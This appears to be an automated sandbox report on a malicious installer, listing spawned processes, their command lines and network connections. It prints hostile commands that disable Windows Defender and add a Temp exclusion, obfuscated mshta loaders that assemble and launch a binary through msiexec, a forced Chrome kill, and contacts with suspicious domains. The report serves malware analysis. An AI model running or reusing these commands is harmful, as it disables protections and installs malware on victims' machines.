PID 3164 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 832 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 832 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1076 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1076 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1076 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3648 wrote to memory of 5020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe
PID 3648 wrote to memory of 5020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe
PID 3648 wrote to memory of 5020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe
PID 4172 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe
PID 4172 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe
PID 4172 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe
PID 32 wrote to memory of 4236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe
PID 32 wrote to memory of 4236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe
PID 32 wrote to memory of 4236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe
PID 208 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe
PID 208 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe
PID 4564 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe
PID 4564 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$7015A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3164 -ip 3164

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4524 -ip 4524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 516 -ip 516

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 620

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\is-MQ2LG.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MQ2LG.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$90238,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 656

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 516 -ip 516

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 748

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 792

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 796

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcf958cc40,0x7ffcf958cc4c,0x7ffcf958cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2560 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 516 -ip 516

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4372,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1276

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4996,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3660,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1104

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 ppgggb.com udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 gcl-gb.biz udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 127.0.0.1:63726 tcp
N/A 127.0.0.1:63728 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
N/A 224.0.0.251:5353 udp
